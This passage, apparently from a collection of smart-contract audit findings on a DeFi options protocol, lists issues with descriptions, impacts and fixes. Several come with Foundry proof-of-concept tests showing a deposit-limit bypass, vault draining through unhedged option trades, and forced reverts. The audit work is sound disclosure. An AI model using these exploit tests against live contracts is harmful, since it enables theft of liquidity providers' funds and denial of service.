\"./utils/Utils.sol\";\\nimport {VaultUtils} from \"./utils/VaultUtils.sol\";\\nimport {MockedIG} from \"./mock/MockedIG.sol\";\\nimport {MockedRegistry} from \"./mock/MockedRegistry.sol\";\\nimport {MockedVault} from \"./mock/MockedVault.sol\";\\nimport {TestnetSwapAdapter} from \"@project/testnet/TestnetSwapAdapter.sol\";\\nimport {PositionManager} from \"@project/periphery/PositionManager.sol\";\\n\\n\\ncontract IGVaultTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.DAILY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n function testVaultDepositLimitBypass() public {\\n _strike = 1e18;\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipDay(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n (,,,,uint totalDeposit,,,,) = vault.vaultState();\\n console.log(\"total deposits\", totalDeposit);\\n\\n vm.startPrank(alice);\\n vault.redeem(1e18);\\n vault.transfer(address(charlie), 1e18-1);\\n vault.initiateWithdraw(1);\\n vm.stopPrank();\\n\\n VaultUtils.logState(vault);\\n (,,,,totalDeposit,,,,) = vault.vaultState();\\n console.log(\"total deposits\", totalDeposit);\\n\\n }\\n}\\n```\\n\\nExecution console:\\n```\\n current epoch 1698566400\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n dead false\\n lockedInitially 2000000000000000000\\n pendingDeposits 0\\n pendingWithdrawals 0\\n pendingPayoffs 0\\n heldShares 0\\n newHeldShares 0\\n base token notional 1000000000000000000\\n side token notional 1000000000000000000\\n ----------------------------------------\\n total deposits 2000000000000000000\\n current epoch 1698566400\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n dead false\\n lockedInitially 2000000000000000000\\n pendingDeposits 0\\n pendingWithdrawals 0\\n pendingPayoffs 0\\n heldShares 0\\n newHeldShares 1\\n base token notional 1000000000000000000\\n side token notional 1000000000000000000\\n ----------------------------------------\\n total deposits 1000000000000000000\\n```\\n\\nNotice:\\nDemonstrates vault deposit limit bypass\\nVault has total assets of 2, but the total deposits is 1, allowing further deposits.ч```\\ncontract Vault is IVault, ERC20, EpochControls, AccessControl, Pausable {\\n```\\n -PositionManager will revert when trying to return back to user excess of the premium transferred from the user when minting positionчmediumч`PositionManager.mint` calculates preliminary premium to be paid for buying the option and transfers it from the user. The actual premium paid may differ, and if it's smaller, excess is returned back to user. However, it is returned using the safeTransferFrom:\\n```\\n if (obtainedPremium > premium) {\\n baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);\\n }\\n```\\n\\nThe problem is that `PositionManager` doesn't approve itself to transfer baseToken to `msg.sender`, and USDC `transferFrom` implementation requires approval even if address is transferring from its own address. Thus the transfer will revert and user will be unable to open position.\\n```\\n function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {\\n _transfer(sender, recipient, amount);\\n _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, \"ERC20: transfer amount exceeds allowance\"));\\n return true;\\n }\\n```\\n\\n```\\n function transferFrom(\\n address from,\\n address to,\\n uint256 value\\n )\\n external\\n override\\n whenNotPaused\\n notBlacklisted(msg.sender)\\n notBlacklisted(from)\\n notBlacklisted(to)\\n returns (bool)\\n {\\n require(\\n value <= allowed[from][msg.sender],\\n \"ERC20: transfer amount exceeds allowance\"\\n );\\n _transfer(from, to, value);\\n allowed[from][msg.sender] = allowed[from][msg.sender].sub(value);\\n return true;\\n }\\n```\\n\\n`PositionManager` doesn't approve itself to do transfers anywhere, so `baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);` will always revert, preventing the user from opening position via `PositionManager`, breaking important protocol function.чConsider using `safeTransfer` instead of `safeTransferFrom` when transferring token from self.чUser is unable to open positions via `PositionManager` in certain situations as all such transactions will revert, breaking important protocol functionality and potentially losing user funds / profit due to failure to open position.ч```\\n if (obtainedPremium > premium) {\\n baseToken.safeTransferFrom(address(this), msg.sender, obtainedPremium - premium);\\n }\\n```\\n -FeeManager `receiveFee` and `trackVaultFee` functions allow anyone to call it with user-provided dvp/vault address and add any arbitrary feeAmount to any address, breaking fees accounting and temporarily bricking DVP smart contractчmediumч`FeeManager` uses `trackVaultFee` function to account vault fees. The problem is that this function can be called by any smart contract implementing `vault()` function (there are no address or role authentication), thus malicious user can break all vault fees accounting by randomly inflating existing vault's fees, making it hard/impossible for admins to determine the real split of fees between vaults. Moreover, malicious user can provide such `feeAmount` to `trackVaultFee` function, which will increase any vault's fee to `uint256.max` value, meaning all following calls to `trackVaultFee` will revert due to fee addition overflow, temporarily bricking DVP smart contract, which calls `trackVaultFee` on all mints and burns, which will always revert until `FeeManager` smart contract is updated to a new address in `AddressProvider`.\\nSimilarly, `receiveFee` function is used to account fee amounts received by different addresses (dvp), which can later be withdrawn by admin via `withdrawFee` function. The problem is that any smart contract implementing `baseToken()` function can call it, thus any malicious user can break all accounting by adding arbitrary amounts to their addresses without actually paying anything. Once some addresses fees are inflated, it will be difficult for admins to track fee amounts which are real, and which are from fake dvps and fake tokens.\\n`FeeManager.trackVaultFee` function has no role/address check:\\n```\\n function trackVaultFee(address vault, uint256 feeAmount) external {\\n // Check sender:\\n IDVP dvp = IDVP(msg.sender);\\n if (vault != dvp.vault()) {\\n revert WrongVault();\\n }\\n\\n vaultFeeAmounts[vault] += feeAmount;\\n\\n emit TransferVaultFee(vault, feeAmount);\\n }\\n```\\n\\nAny smart contract implementing `vault()` function can call it. The vault address returned can be any address, thus user can inflate vault fees both for existing real vaults, and for any addresses user chooses. This totally breaks all vault fees accounting.\\n`FeeManager.receiveFee` function has no role/address check either:\\n```\\n function receiveFee(uint256 feeAmount) external {\\n _getBaseTokenInfo(msg.sender).safeTransferFrom(msg.sender, address(this), feeAmount);\\n senders[msg.sender] += feeAmount;\\n\\n emit ReceiveFee(msg.sender, feeAmount);\\n }\\n// rest of code\\n function _getBaseTokenInfo(address sender) internal view returns (IERC20Metadata token) {\\n token = IERC20Metadata(IVaultParams(sender).baseToken());\\n }\\n```\\n\\nAny smart contract crafted by malicious user can call it. It just has to return base token, which can also be token created by the user. After transfering this fake base token, the `receiveFee` function will increase user's fee balance as if it was real token transferred.чConsider adding a whitelist of addresses which can call these functions.чMalicious users can break all fee and vault fee accounting by inflating existing vaults or user addresses fees earned without actually paying these fees, making it hard/impossible for admins to determine the actual fees earned from each vault or dvp. Moreover, malicious user can temporarily brick DVP smart contract by inflating vault's accounted fees to `uint256.max`, thus making all DVP mints and burns (which call trackVaultFee) revert.ч```\\n function trackVaultFee(address vault, uint256 feeAmount) external {\\n // Check sender:\\n IDVP dvp = IDVP(msg.sender);\\n if (vault != dvp.vault()) {\\n revert WrongVault();\\n }\\n\\n vaultFeeAmounts[vault] += feeAmount;\\n\\n emit TransferVaultFee(vault, feeAmount);\\n }\\n```\\n -Trading out of the money options has delta = 0 which breaks protocol assumptions of traders profit being fully hedged and can result in a loss of funds to LPsчmediumчSmilee protocol fully hedges all traders pnl by re-balancing the vault between base and side tokens after each trade. This is the assumption about this from the docs:\\nIn the other words, any profit for traders is taken from the hedge and not from the vault Liquidity Providers funds. LP payoff must be at least the underlying DEX (Uniswap) payoff without fees with the same settings.\\nHowever, out of the money options (IG Bull when `price < strike` or IG Bear when price > strike) have `delta = 0`, meaning that trading such options doesn't influence vault re-balancing. Since the price of these options changes depending on current asset price, any profit gained by traders from these trades is not hedged and thus becomes the loss of the vault LPs, breaking the assumption referenced above.\\nAs a result, LPs payout can becomes less than underlying DEX LPs payout without fees. And in extreme cases the vault funds might not be enough to cover traders payoff.\\nWhen the vault delta hedges its position after each trade, it only hedges in the money options, ignoring any out of the money options. For example, this is the calculation of the IG Bull delta (s is the current asset price, `k` is the strike):\\n```\\n /**\\n Δ_bull = (1 / θ) * F\\n F = {\\n@@@ * 0 if (S < K)\\n * (1 - √(K / Kb)) / K if (S > Kb)\\n * 1 / K - 1 / √(S * K) if (K < S < Kb)\\n }\\n */\\n function bullDelta(uint256 k, uint256 kB, uint256 s, uint256 theta) internal pure returns (int256) {\\n SD59x18 delta;\\n if (s <= k) {\\n@@@ return 0;\\n }\\n```\\n\\nThis is example scenario to demonstrate the issue:\\nstrike = 1\\nvault has deposits = 2 (base = 1, side = 1), available liquidity: bull = 1, bear = 1\\ntrader buys 1 IG bear. This ensures that no vault re-balance happens when `price < strike`\\nprice drops to 0.9. Trader buys 1 IG bull (premium paid = 0.000038)\\nprice raises to 0.99. Trader sells 1 IG bull (premium received = 0.001138). Trader profit = 0.0011\\nprice is back to 1. Trader sells back 1 IG bear.\\nat this point the vault has (base = 0.9989, side = 1), meaning LPs have lost some funds when the price = strike.\\nWhile the damage from 1 trade is not large, if this is repeated several times, the damage to LP funds will keep inceasing.\\nThis can be especially dangerous if very long dated expiries are used, for example annual IG options. If the asset price remains below the strike for most of the time and IG Bear liquidity is close to 100% usage, then all IG Bull trades will be unhedged, thus breaking the core protocol assumption that traders profit should not translate to LPs loss: in such case traders profit will be the same loss for LPs. In extreme volatility, if price drops by 50% then recovers, traders can profit 3% of the vault with each trade, so after 33 trades the vault will be fully drained.чThe issue seems to be from the approximation of the delta for OTM options. Statistically, long-term, the issue shouldn't be a problem as the long-term expectation is positive for the LPs profit due to it. However, short-term, the traders profit can create issues, and this seems to be the protocol's core assumption. Possible solution can include more precise delta calculation, maybe still approximation, but slightly more precise than the current approximation used.\\nAlternatively, keep track of underlying DEX equivalent of LP payoff at the current price and if, after the trade, vault's notional is less than that, add fee = the difference, to ensure that the assumption above is always true (similar to how underlying DEX slippage is added as a fee).чIn some specific trading conditions (IG Bear liquidity used close to 100% if price < strike, or IG Bull liquidity used close to 100% if price > strike), all or most of the traders pnl is not hedged and thus becomes loss or profit of the LPs, breaking the core protocol assumptions about hedging and in extreme cases can drain significant percentage of the vault (LPs) funds, up to a point of not being able to payout traders payoff.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from \"forge-std/Test.sol\";\\nimport {console} from \"forge-std/console.sol\";\\nimport {UD60x18, ud, convert} from \"@prb/math/UD60x18.sol\";\\n\\nimport {IERC20} from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport {IPositionManager} from \"@project/interfaces/IPositionManager.sol\";\\nimport {Epoch} from \"@project/lib/EpochController.sol\";\\nimport {AmountsMath} from \"@project/lib/AmountsMath.sol\";\\nimport {EpochFrequency} from \"@project/lib/EpochFrequency.sol\";\\nimport {OptionStrategy} from \"@project/lib/OptionStrategy.sol\";\\nimport {AddressProvider} from \"@project/AddressProvider.sol\";\\nimport {MarketOracle} from \"@project/MarketOracle.sol\";\\nimport {FeeManager} from \"@project/FeeManager.sol\";\\nimport {Vault} from \"@project/Vault.sol\";\\nimport {TestnetToken} from \"@project/testnet/TestnetToken.sol\";\\nimport {TestnetPriceOracle} from \"@project/testnet/TestnetPriceOracle.sol\";\\nimport {DVPUtils} from \"./utils/DVPUtils.sol\";\\nimport {TokenUtils} from \"./utils/TokenUtils.sol\";\\nimport {Utils} from \"./utils/Utils.sol\";\\nimport {VaultUtils} from \"./utils/VaultUtils.sol\";\\nimport {MockedIG} from \"./mock/MockedIG.sol\";\\nimport {MockedRegistry} from \"./mock/MockedRegistry.sol\";\\nimport {MockedVault} from \"./mock/MockedVault.sol\";\\nimport {TestnetSwapAdapter} from \"@project/testnet/TestnetSwapAdapter.sol\";\\nimport {PositionManager} from \"@project/periphery/PositionManager.sol\";\\n\\n\\ncontract IGTradeTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.WEEKLY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n // try to buy/sell ig bull below strike for user's profit\\n // this will not be hedged, and thus the vault should lose funds\\n function test() public {\\n _strike = 1e18;\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), _strike);\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipWeek(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n DVPUtils.debugState(ig);\\n\\n // to ensure no rebalance from price movement\\n console.log(\"Buy 100% IG BEAR @ 1.0\");\\n testBuyOption(1e18, 0, 1e18);\\n\\n for (uint i = 0; i < 20; i++) {\\n // price moves down, we buy\\n vm.warp(block.timestamp + 1 hours);\\n console.log(\"Buy 100% IG BULL @ 0.9\");\\n testBuyOption(0.9e18, 1e18, 0);\\n\\n // price moves up, we sell\\n vm.warp(block.timestamp + 1 hours);\\n console.log(\"Sell 100% IG BULL @ 0.99\");\\n testSellOption(0.99e18, 1e18, 0);\\n }\\n\\n // sell back original\\n console.log(\"Sell 100% IG BEAR @ 1.0\");\\n testSellOption(1e18, 0, 1e18);\\n }\\n\\n function testBuyOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n (uint256 premium, uint256 fee) = _assurePremium(charlie, _strike, optionAmountUp, optionAmountDown);\\n\\n vm.startPrank(charlie);\\n premium = ig.mint(charlie, _strike, optionAmountUp, optionAmountDown, premium, 10e18, 0);\\n vm.stopPrank();\\n\\n console.log(\"premium\", premium);\\n (uint256 btAmount, uint256 stAmount) = vault.balances();\\n console.log(\"base token notional\", btAmount);\\n console.log(\"side token notional\", stAmount);\\n }\\n\\n function testSellOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n uint256 charliePayoff;\\n uint256 charliePayoffFee;\\n {\\n vm.startPrank(charlie);\\n (charliePayoff, charliePayoffFee) = ig.payoff(\\n ig.currentEpoch(),\\n _strike,\\n optionAmountUp,\\n optionAmountDown\\n );\\n\\n charliePayoff = ig.burn(\\n ig.currentEpoch(),\\n charlie,\\n _strike,\\n optionAmountUp,\\n optionAmountDown,\\n charliePayoff,\\n 0.1e18\\n );\\n vm.stopPrank();\\n\\n console.log(\"payoff received\", charliePayoff);\\n (uint256 btAmount, uint256 stAmount) = vault.balances();\\n console.log(\"base token notional\", btAmount);\\n console.log(\"side token notional\", stAmount);\\n }\\n }\\n\\n function _assurePremium(\\n address user,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown\\n ) private returns (uint256 premium_, uint256 fee) {\\n (premium_, fee) = ig.premium(strike, amountUp, amountDown);\\n TokenUtils.provideApprovedTokens(admin, address(baseToken), user, address(ig), premium_*5, vm);\\n }\\n}\\n```\\n\\nExecution console:\\n```\\n baseToken balance 1000000000000000000\\n sideToken balance 1000000000000000000\\n dead false\\n lockedInitially 2000000000000000000\\n// rest of code\\n Buy 100% IG BEAR @ 1.0\\n premium 6140201098441368\\n base token notional 1006140201098441412\\n side token notional 999999999999999956\\n Buy 100% IG BULL @ 0.9\\n premium 3853262173300493\\n base token notional 1009993463271741905\\n side token notional 999999999999999956\\n Sell 100% IG BULL @ 0.99\\n payoff received 4865770659690694\\n base token notional 1005127692612051211\\n side token notional 999999999999999956\\n// rest of code\\n Buy 100% IG BULL @ 0.9\\n premium 1827837493502948\\n base token notional 984975976168184269\\n side token notional 999999999999999956\\n Sell 100% IG BULL @ 0.99\\n payoff received 3172781130161218\\n base token notional 981803195038023051\\n side token notional 999999999999999956\\n Sell 100% IG BEAR @ 1.0\\n payoff received 3269654020920760\\n base token notional 978533541017102291\\n side token notional 999999999999999956\\n```\\n\\nNotice:\\nInitial vault balance at the asset price of 1.0 is base = 1, side = 1\\nAll IG Bull trades do not change vault side token balance (no re-balancing happens)\\nAfter 20 trades, at the asset price of 1.0, base = 0.9785, side = 1\\nThis means that 20 profitable trades create a 1.07% loss for the vault. Similar scenario for annual options with 50% price move shows 3% vault loss per trade.ч```\\n /**\\n Δ_bull = (1 / θ) * F\\n F = {\\n@@@ * 0 if (S < K)\\n * (1 - √(K / Kb)) / K if (S > Kb)\\n * 1 / K - 1 / √(S * K) if (K < S < Kb)\\n }\\n */\\n function bullDelta(uint256 k, uint256 kB, uint256 s, uint256 theta) internal pure returns (int256) {\\n SD59x18 delta;\\n if (s <= k) {\\n@@@ return 0;\\n }\\n```\\n -If the vault's side token balance is 0 or a tiny amount, then most if not all IG Bear trades will revert due to incorrect check of computation error during delta hedge amount calculationчmediumчWhen delta hedge amount is calculated in `FinanceIGDelta.deltaHedgeAmount`, the last step is to verify that delta hedge amount to sell is slightly more than vault's side token due to computation error. The check is the following:\\n```\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n\\nThe check works correctly most of the time, but if the vault's side token (param.sideTokensAmount) is 0 or close to it, then the check will always fail, because `0 / 10000 = 0` and unsigned amount can not be less than 0. This means that even tiny amount to sell (like 1 wei) will revert the transaction if the vault has 0 side tokens.\\nVault's side token is 0 when:\\nthe current price trades above high boundary (Kb)\\nand IG Bull used liquidity equals 0\\nIn such situation, any IG bear trade doesn't impact hedge amount, but due to computation error will almost always result in tiny but non-0 side token amount to sell value, which will revert due to incorrect comparision described above.чPossibly check both relative (sideToken / 10000) and absolute (e.g. 1000 or side token UNIT / 10000) value. Alternatively, always limit side token to sell amount to max of side token balance when hedging (but needs additional research if that might create issues).чAlmost all IG Bear trades will revert in certain situations, leading to core protocol function being unavailable and potentially loss of funds to the users who expected to do these trades.\\nProof Of Concept\\nCopy to attack.t.sol:\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.15;\\n\\nimport {Test} from \"forge-std/Test.sol\";\\nimport {console} from \"forge-std/console.sol\";\\nimport {UD60x18, ud, convert} from \"@prb/math/UD60x18.sol\";\\n\\nimport {IERC20} from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\nimport {IPositionManager} from \"@project/interfaces/IPositionManager.sol\";\\nimport {Epoch} from \"@project/lib/EpochController.sol\";\\nimport {AmountsMath} from \"@project/lib/AmountsMath.sol\";\\nimport {EpochFrequency} from \"@project/lib/EpochFrequency.sol\";\\nimport {OptionStrategy} from \"@project/lib/OptionStrategy.sol\";\\nimport {AddressProvider} from \"@project/AddressProvider.sol\";\\nimport {MarketOracle} from \"@project/MarketOracle.sol\";\\nimport {FeeManager} from \"@project/FeeManager.sol\";\\nimport {Vault} from \"@project/Vault.sol\";\\nimport {TestnetToken} from \"@project/testnet/TestnetToken.sol\";\\nimport {TestnetPriceOracle} from \"@project/testnet/TestnetPriceOracle.sol\";\\nimport {DVPUtils} from \"./utils/DVPUtils.sol\";\\nimport {TokenUtils} from \"./utils/TokenUtils.sol\";\\nimport {Utils} from \"./utils/Utils.sol\";\\nimport {VaultUtils} from \"./utils/VaultUtils.sol\";\\nimport {MockedIG} from \"./mock/MockedIG.sol\";\\nimport {MockedRegistry} from \"./mock/MockedRegistry.sol\";\\nimport {MockedVault} from \"./mock/MockedVault.sol\";\\nimport {TestnetSwapAdapter} from \"@project/testnet/TestnetSwapAdapter.sol\";\\nimport {PositionManager} from \"@project/periphery/PositionManager.sol\";\\n\\n\\ncontract IGTradeTest is Test {\\n using AmountsMath for uint256;\\n\\n address admin = address(0x1);\\n\\n // User of Vault\\n address alice = address(0x2);\\n address bob = address(0x3);\\n\\n //User of DVP\\n address charlie = address(0x4);\\n address david = address(0x5);\\n\\n AddressProvider ap;\\n TestnetToken baseToken;\\n TestnetToken sideToken;\\n FeeManager feeManager;\\n\\n MockedRegistry registry;\\n\\n MockedVault vault;\\n MockedIG ig;\\n TestnetPriceOracle priceOracle;\\n TestnetSwapAdapter exchange;\\n uint _strike;\\n\\n function setUp() public {\\n vm.warp(EpochFrequency.REF_TS);\\n //ToDo: Replace with Factory\\n vm.startPrank(admin);\\n ap = new AddressProvider(0);\\n registry = new MockedRegistry();\\n ap.grantRole(ap.ROLE_ADMIN(), admin);\\n registry.grantRole(registry.ROLE_ADMIN(), admin);\\n ap.setRegistry(address(registry));\\n\\n vm.stopPrank();\\n\\n vault = MockedVault(VaultUtils.createVault(EpochFrequency.WEEKLY, ap, admin, vm));\\n priceOracle = TestnetPriceOracle(ap.priceOracle());\\n\\n baseToken = TestnetToken(vault.baseToken());\\n sideToken = TestnetToken(vault.sideToken());\\n\\n vm.startPrank(admin);\\n \\n ig = new MockedIG(address(vault), address(ap));\\n ig.grantRole(ig.ROLE_ADMIN(), admin);\\n ig.grantRole(ig.ROLE_EPOCH_ROLLER(), admin);\\n vault.grantRole(vault.ROLE_ADMIN(), admin);\\n vm.stopPrank();\\n ig.setOptionPrice(1e3);\\n ig.setPayoffPerc(0.1e18); // 10 % -> position paying 1.1\\n ig.useRealDeltaHedge();\\n ig.useRealPercentage();\\n ig.useRealPremium();\\n\\n DVPUtils.disableOracleDelayForIG(ap, ig, admin, vm);\\n\\n vm.prank(admin);\\n registry.registerDVP(address(ig));\\n vm.prank(admin);\\n MockedVault(vault).setAllowedDVP(address(ig));\\n feeManager = FeeManager(ap.feeManager());\\n\\n exchange = TestnetSwapAdapter(ap.exchangeAdapter());\\n }\\n\\n // try to buy/sell ig bull below strike for user's profit\\n // this will not be hedged, and thus the vault should lose funds\\n function test() public {\\n _strike = 1e18;\\n VaultUtils.addVaultDeposit(alice, 1e18, admin, address(vault), vm);\\n VaultUtils.addVaultDeposit(bob, 1e18, admin, address(vault), vm);\\n\\n Utils.skipWeek(true, vm);\\n\\n vm.prank(admin);\\n ig.rollEpoch();\\n\\n VaultUtils.logState(vault);\\n DVPUtils.debugState(ig);\\n\\n testBuyOption(1.24e18, 1, 0); // re-balance to have 0 side tokens\\n testBuyOption(1.24e18, 0, 0.1e18); // reverts due to computation error and incorrect check to fix it\\n }\\n\\n function testBuyOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal {\\n\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n (uint256 premium, uint256 fee) = _assurePremium(charlie, _strike, optionAmountUp, optionAmountDown);\\n\\n vm.startPrank(charlie);\\n premium = ig.mint(charlie, _strike, optionAmountUp, optionAmountDown, premium, 10e18, 0);\\n vm.stopPrank();\\n\\n console.log(\"premium\", premium);\\n }\\n\\n function testSellOption(uint price, uint128 optionAmountUp, uint128 optionAmountDown) internal returns (uint) {\\n vm.prank(admin);\\n priceOracle.setTokenPrice(address(sideToken), price);\\n\\n uint256 charliePayoff;\\n uint256 charliePayoffFee;\\n {\\n vm.startPrank(charlie);\\n (charliePayoff, charliePayoffFee) = ig.payoff(\\n ig.currentEpoch(),\\n _strike,\\n optionAmountUp,\\n optionAmountDown\\n );\\n\\n charliePayoff = ig.burn(\\n ig.currentEpoch(),\\n charlie,\\n _strike,\\n optionAmountUp,\\n optionAmountDown,\\n charliePayoff,\\n 0.1e18\\n );\\n vm.stopPrank();\\n\\n console.log(\"payoff received\", charliePayoff);\\n }\\n }\\n\\n function _assurePremium(\\n address user,\\n uint256 strike,\\n uint256 amountUp,\\n uint256 amountDown\\n ) private returns (uint256 premium_, uint256 fee) {\\n (premium_, fee) = ig.premium(strike, amountUp, amountDown);\\n TokenUtils.provideApprovedTokens(admin, address(baseToken), user, address(ig), premium_*5, vm);\\n }\\n}\\n```\\n\\nNotice: execution will revert when trying to buy IG Bear options.ч```\\n if (SignedMath.abs(tokensToSwap) > params.sideTokensAmount) {\\n if (SignedMath.abs(tokensToSwap) - params.sideTokensAmount < params.sideTokensAmount / 10000) {\\n tokensToSwap = SignedMath.revabs(params.sideTokensAmount, true);\\n }\\n }\\n```\\n -Mint and sales can be dossed due to lack of safeApprove to 0чmediumчThe lack of approval to 0 to the dvp contract, and the fee managers during DVP mints and sales will cause that subsequent transactions involving approval of these contracts to spend the basetoken will fail, breaking their functionality.\\nWhen DVPs are to be minted and sold through the PositionManager, the `mint` and `sell` functions are invoked. The first issue appears here, where the DVP contract is approved to spend the basetoken using the OpenZeppelin's `safeApprove` function, without first approving to zero. Further down the line, the `mint` and `sell` functions make calls to the DVP contract to `mint` and burn DVP respectively.\\nThe _mint and _burn functions in the DVP contract approves the fee manager to spend the fee - vaultFee/netFee.\\nThis issue here is that OpenZeppelin's `safeApprove()` function does not allow changing a non-zero allowance to another non-zero allowance. This will therefore cause all subsequent approval of the basetoken to fail after the first approval, dossing the contract's minting and selling/burning functionality.\\nOpenZeppelin's `safeApprove()` will revert if the account already is approved and the new `safeApprove()` is done with a non-zero value.\\n```\\n function safeApprove(\\n IERC20 token,\\n address spender,\\n uint256 value\\n ) internal {\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n require(\\n (value == 0) || (token.allowance(address(this), spender) == 0),\\n \"SafeERC20: approve from non-zero to non-zero allowance\"\\n );\\n _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));\\n }\\n```\\nчApprove first to 0;\\nUpdate the OpenZeppelin version to the latest and use the `forceApprove` functions instead;\\nRefactor the functions to allow for direct transfer of base tokens to the DVP and FeeManager contracts directly.чThis causes that after the first approval for the baseToken has been given, subsequent approvals will fail causing the functions to fail.ч```\\n function safeApprove(\\n IERC20 token,\\n address spender,\\n uint256 value\\n ) internal {\\n // safeApprove should only be called when setting an initial allowance,\\n // or when resetting it to zero. To increase and decrease it, use\\n // 'safeIncreaseAllowance' and 'safeDecreaseAllowance'\\n require(\\n (value == 0) || (token.allowance(address(this), spender) == 0),\\n \"SafeERC20: approve from non-zero to non-zero allowance\"\\n );\\n _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value));\\n }\\n```\\n -User wrapped tokens get stuck in master router because of incorrect calculationчmediumчSwapping exact tokens for ETH swaps underlying token amount, not wrapped token amount and 